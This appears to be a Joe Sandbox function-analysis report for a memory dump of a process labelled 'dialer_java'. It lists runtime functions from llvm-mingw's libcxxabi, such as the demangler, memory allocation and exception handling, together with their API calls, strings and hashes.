Opcode ID: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
Instruction ID: e16b968638f77285e972e98175404e5e431d688228eeba7c0ccb22990f43e671
Opcode Fuzzy Hash: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
Instruction Fuzzy Hash: 55117390E0B51B51EE34A790E8552BC9796DF81F82F41A2B7C50E83396DE3CA90EC309

Function 00007FF695DD2797 Relevance: 13.6, APIs: 9, Instructions: 95COMMON

Download Yara Rule

APIs

isxdigit.MSVCRT ref: 00007FF695DD27B2
isxdigit.MSVCRT ref: 00007FF695DD27C4
isxdigit.MSVCRT ref: 00007FF695DD27D6
isxdigit.MSVCRT ref: 00007FF695DD27E8
isxdigit.MSVCRT ref: 00007FF695DD27FA
isxdigit.MSVCRT ref: 00007FF695DD280C
isxdigit.MSVCRT ref: 00007FF695DD281E
isxdigit.MSVCRT ref: 00007FF695DD2830
malloc.MSVCRT ref: 00007FF695DD287D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
Instruction ID: a7d42b64c11a7d4814f4ba2dfb7298a4fba2ad9ced3320c50bba6c4a942f0f01
Opcode Fuzzy Hash: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
Instruction Fuzzy Hash: BE41B621608B8242E7684F31D49037AA7E0EF41F45F0856B5CE9E86A90DF3CEDA9D704

Function 00007FF695DDB110 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 183COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDB24B
realloc.MSVCRT ref: 00007FF695DDB2C5

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DDB41D
basic_string, xrefs: 00007FF695DDB2FB, 00007FF695DDB340
starts_with(SV, "basic_"), xrefs: 00007FF695DDB416
allocator, xrefs: 00007FF695DDB302, 00007FF695DDB347

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: mallocrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$allocator$basic_string$starts_with(SV, "basic_")
API String ID: 948496778-4167058683
Opcode ID: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction ID: 99210ed3597a7a0f31b7d194d96d6aaf3b6f178b631c4b1aba599a06684bf613
Opcode Fuzzy Hash: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction Fuzzy Hash: 3E61F572A05B8681EF248B15E4842BD7BA0EB05F84F449372DA9D4B790DF3CE95AC708

Function 00007FF695DDB520 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDB55B
realloc.MSVCRT ref: 00007FF695DDB5D1
memcpy.MSVCRT ref: 00007FF695DDB5EF
realloc.MSVCRT ref: 00007FF695DDB62E
realloc.MSVCRT ref: 00007FF695DDB694
realloc.MSVCRT ref: 00007FF695DDB6F3

Strings

or<char>, xrefs: 00007FF695DDB6B0

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID: or<char>
API String ID: 1833655766-3520798227
Opcode ID: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction ID: 064459b2e5fd851b778ad8275707f82edc3aed1c242d699a2a0bbe474b7c8932
Opcode Fuzzy Hash: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction Fuzzy Hash: 8A518DB2A06B4682EA258F55F540269A3A1EB94BC4F00D276CB8E47751EF3CE599C700

Function 00007FF695DC7F50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF695DC804A
_assert.MSVCRT ref: 00007FF695DC809B
calloc.MSVCRT ref: 00007FF695DC80DD
memset.MSVCRT ref: 00007FF695DC8106

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp, xrefs: 00007FF695DC803D, 00007FF695DC808E
reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0, xrefs: 00007FF695DC8087
reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0, xrefs: 00007FF695DC8036

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assert$callocmemset
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp$reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0$reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0
API String ID: 1513271871-212362933
Opcode ID: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
Instruction ID: e423f3e08145c6ec9e3ec5d7e10a7bf02ad8a2ce0bbc50f15ee1d7c608289544
Opcode Fuzzy Hash: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
Instruction Fuzzy Hash: 83419E11F2995280FE359B15EA11AB963D1EF81F80F4162B5C80E83795EF3DAE4ED348

Function 00007FF695DC2730 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,?,?,00007FF695DEFEF8,00007FF695DEFEF8,?,?,00007FF695DC0000,?,00007FF695DC2521), ref: 00007FF695DC27F3
VirtualProtect.KERNEL32(?,?,?,?,00007FF695DEFEF8,00007FF695DEFEF8,?,?,00007FF695DC0000,?,00007FF695DC2521), ref: 00007FF695DC2857
memcpy.MSVCRT ref: 00007FF695DC2870
GetLastError.KERNEL32(?,?,?,?,00007FF695DEFEF8,00007FF695DEFEF8,?,?,00007FF695DC0000,?,00007FF695DC2521), ref: 00007FF695DC28B3

Strings

Address %p has no image-section, xrefs: 00007FF695DC2884
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF695DC28A7
VirtualProtect failed with code 0x%x, xrefs: 00007FF695DC28B9

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
Instruction ID: dc02ee2d5111cc82334b869c175b23660ac796db256ad86e7e8045da862139e3
Opcode Fuzzy Hash: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
Instruction Fuzzy Hash: 1A418C62A19A0281EE31CB55D8846B927E0EF46F80F5556B2CE4EC37A1DF3CED4AC705

Function 00007FF695DDB372 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDB3E6
memcpy.MSVCRT ref: 00007FF695DDB400
_assert.MSVCRT ref: 00007FF695DDB42A

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DDB41D
basic_ostream, xrefs: 00007FF695DDB377
starts_with(SV, "basic_"), xrefs: 00007FF695DDB416
basi, xrefs: 00007FF695DDB39A

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_ostream$starts_with(SV, "basic_")
API String ID: 2326172077-1855325571
Opcode ID: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
Instruction ID: 13c5881280da159b862aaa1934976e355bddeaf12d65ebb9db46281189806cea
Opcode Fuzzy Hash: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
Instruction Fuzzy Hash: DE11C4F2F05A0282EA748B05F580379A3A1EF14FC5F44A175CA0D47B94EF2CE9598704

Function 00007FF695DC1880 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 33COMMON

Download Yara Rule

APIs

abort.MSVCRT(00000000,00000000,00000000,?,00007FF695DC1C09), ref: 00007FF695DC19EF
_assert.MSVCRT ref: 00007FF695DC1A08

Strings

actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND), xrefs: 00007FF695DC2141
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF695DC19FB, 00007FF695DC2148, 00007FF695DC2162, 00007FF695DC217C
(base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF695DC19F4
actions & _UA_SEARCH_PHASE, xrefs: 00007FF695DC2175
actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND), xrefs: 00007FF695DC215B

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assertabort
String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND)$actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND)$actions & _UA_SEARCH_PHASE
API String ID: 1072228434-30274522
Opcode ID: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
Instruction ID: ae728dbc8c8fdd62f5101d7d878157c9c0cd0d6a5cd73073d505d2c3cce36cd1
Opcode Fuzzy Hash: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
Instruction Fuzzy Hash: 37F05E62E1A91690EE30879AEC815B85399EF14F65F511BB2DD1DC62E0EE2CA94EC204

Function 00007FF695DD4BE0 Relevance: 12.2, APIs: 8, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD4C16
realloc.MSVCRT ref: 00007FF695DD4D5F
realloc.MSVCRT ref: 00007FF695DD4DB9
memcpy.MSVCRT ref: 00007FF695DD4DD7
realloc.MSVCRT ref: 00007FF695DD4E3C
realloc.MSVCRT ref: 00007FF695DD4EB0
memcmp.MSVCRT ref: 00007FF695DD4EE5
realloc.MSVCRT ref: 00007FF695DD4F25

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcmpmemcpy
String ID:
API String ID: 2517790541-0
Opcode ID: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
Instruction ID: f1f8c9274935add57bcf54af85280da8f6b7e87b0d4c488c4b55beab7da2b655
Opcode Fuzzy Hash: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
Instruction Fuzzy Hash: 4291B4B3A05B8682EB358F16E444369A3E0FB54B80F049272CF9D47BA1EF7CE9558704

Function 00007FF695DD5480 Relevance: 12.2, APIs: 8, Instructions: 222COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD54BF
realloc.MSVCRT ref: 00007FF695DD550E
realloc.MSVCRT ref: 00007FF695DD5568
realloc.MSVCRT ref: 00007FF695DD55C6
realloc.MSVCRT ref: 00007FF695DD5623
realloc.MSVCRT ref: 00007FF695DD5670
realloc.MSVCRT ref: 00007FF695DD56FC
realloc.MSVCRT ref: 00007FF695DD5757

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
Instruction ID: 265b2ef6a0e6a42f0f65783ed2a2c1f51b814da0191c6760e85de12ed251aa69
Opcode Fuzzy Hash: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
Instruction Fuzzy Hash: DF9161B2A05B4682EA358F55F45436DB3E1EB58BC0F549172CB9E477A0EF3CE4498304

Function 00007FF695DC71C0 Relevance: 10.9, APIs: 7, Instructions: 368COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF695DC7424
fputwc.MSVCRT ref: 00007FF695DC743B
fputwc.MSVCRT ref: 00007FF695DC74B0

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fputwc
String ID:
API String ID: 761389786-0
Opcode ID: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
Instruction ID: 3f9af2ad8cbbd8b129d821ec58f95593fd2453eaba4e4726079d78239cb8412a
Opcode Fuzzy Hash: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
Instruction Fuzzy Hash: 3AE15172A186028BEF788E16E15473AB6D1EB44F50F00627DDB9BC6A91DF2CEC44C748

Function 00007FF695DCF9C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DCFAD8
realloc.MSVCRT ref: 00007FF695DCFB7A
malloc.MSVCRT ref: 00007FF695DCFCAA
malloc.MSVCRT ref: 00007FF695DCFD21
memcpy.MSVCRT ref: 00007FF695DCFD3C

Strings

auto, xrefs: 00007FF695DCFD04

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$memcpyrealloc
String ID: auto
API String ID: 2642181057-1723475450
Opcode ID: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
Instruction ID: 59454f0789ae048b4c51f966e685c15deadeac464f38862a651888969501a0c5
Opcode Fuzzy Hash: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
Instruction Fuzzy Hash: 78A1C162619B8281EE388B20E5443F96BE5EB04B90F445376CBAD863D1DF7CE959C304

Function 00007FF695DE1280 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF695DE1451

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
Instruction ID: 1912df22bf00800480aa159102bbc3521279ca1d38162b4072a22052c76f0a3f
Opcode Fuzzy Hash: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
Instruction Fuzzy Hash: 8171E022F0818246F7758AA6E58177DA6D1EB14F54F0463B1CE6E96BC2DE3CEC8D8704

Function 00007FF695DDDEF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDDF1C
realloc.MSVCRT ref: 00007FF695DDDFE8
realloc.MSVCRT ref: 00007FF695DDE042
realloc.MSVCRT ref: 00007FF695DDE0A3

Strings

noexcept, xrefs: 00007FF695DDDFFD
imaginary, xrefs: 00007FF695DDDF7E

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$malloc
String ID: imaginary$noexcept
API String ID: 454241450-3971218317
Opcode ID: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
Instruction ID: e98b4d679a94c1d18f1bd532cf87517946c0760102ad5005ae9303983035a04b
Opcode Fuzzy Hash: 87dcfbe6bad413ec65d64ef39e25c3b70162464389fa30d34c7d9aefbdbe6664
Instruction Fuzzy Hash: 7C51A1B2A05F8682EB288F25F4407ADB3A0EB54F84F449676DB8D47794EF38D995C340

Function 00007FF695DC16B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF695DC1843
_assert.MSVCRT ref: 00007FF695DC185D
_assert.MSVCRT ref: 00007FF695DC1877

Part of subcall function 00007FF695DC4BC0: fflush.MSVCRT ref: 00007FF695DC4C0E

Part of subcall function 00007FF695DC4CA0: fflush.MSVCRT ref: 00007FF695DC4CE3

Strings

actions & _UA_CLEANUP_PHASE, xrefs: 00007FF695DC182F
results.reason == _URC_HANDLER_FOUND, xrefs: 00007FF695DC1849, 00007FF695DC1863
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF695DC1836, 00007FF695DC1850, 00007FF695DC186A

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assert$fflush
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & _UA_CLEANUP_PHASE$results.reason == _URC_HANDLER_FOUND
API String ID: 289967094-1554099779
Opcode ID: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
Instruction ID: 2b916231c2c75bcb1265aa250a75dcc3e133db147f789e8ef3bbf1c468a8c7b6
Opcode Fuzzy Hash: 53fe620101f0f1196f6f36d0f1a8cbc34963f56b63f02f4e93a45d900a4484cd
Instruction Fuzzy Hash: 8741A021B0D65281EE328B82E6407B9A3E1EF95F90F046371DE4D87BD4DF2DE9498349

Function 00007FF695DDEB50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDEB8E
realloc.MSVCRT ref: 00007FF695DDEBEA
realloc.MSVCRT ref: 00007FF695DDEC45
realloc.MSVCRT ref: 00007FF695DDECA6

Strings

tInt, xrefs: 00007FF695DDEBFF
unsigned, xrefs: 00007FF695DDEBA3

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: tInt$unsigned
API String ID: 471065373-1789806510
Opcode ID: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
Instruction ID: 6228e4e4c6b2ca5ffd0beaec3681bede5b09c8b158935cf71ffe1ed8a82a3f4a
Opcode Fuzzy Hash: ef3acf26705adc4dc0c40c1580519def5e7105bcddab961c785bcf0feaa8951c
Instruction Fuzzy Hash: A3416FB2A06B8682DA358F56F45426DB3A1EB64BC0F00C672CB9E47790EF3CE9458340

Function 00007FF695DD12D2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF695DD0B79
malloc.MSVCRT ref: 00007FF695DD1396
